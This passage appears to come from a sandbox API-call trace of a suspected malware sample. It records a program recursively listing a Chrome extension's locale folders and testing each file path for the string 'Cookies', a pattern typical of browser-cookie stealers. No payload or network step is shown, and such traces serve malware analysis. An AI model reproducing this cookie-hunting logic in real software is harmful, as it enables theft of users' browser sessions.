Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0163.295] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*.*" [0163.295] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.295] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.295] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.295] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.296] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.296] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned 137 [0163.296] lstrlenW (lpString="\\") returned 1 [0163.296] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0163.296] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\" [0163.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\") returned 138 [0163.296] lstrlenW (lpString="messages.json") returned 13 [0163.296] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\" [0163.296] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" [0163.296] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.296] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.296] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.296] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="he", cAlternateFileName="")) returned 1 [0163.296] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0163.296] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0163.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.296] lstrlenW (lpString="\\") returned 1 [0163.297] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.297] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.297] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.297] lstrlenW (lpString="he") returned 2 [0163.297] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.297] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0163.297] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0163.297] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*.*" [0163.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.297] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.297] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.297] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.297] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.297] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.297] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned 137 [0163.297] lstrlenW (lpString="\\") returned 1 [0163.297] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0163.297] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\" [0163.297] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\") returned 138 [0163.298] lstrlenW (lpString="messages.json") returned 13 [0163.298] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\" [0163.298] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" [0163.298] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json", lpSrch="Cookies") returned 0x0 [0163.298] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.298] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.298] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="hi", cAlternateFileName="")) returned 1 [0163.298] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0163.298] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0163.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.298] lstrlenW (lpString="\\") returned 1 [0163.298] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.298] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.298] lstrlenW (lpString="hi") returned 2 [0163.298] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.298] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0163.299] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0163.299] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*.*" [0163.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.299] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.299] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.299] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.299] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.299] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x123, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.299] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned 137 [0163.299] lstrlenW (lpString="\\") returned 1 [0163.299] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi" [0163.299] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 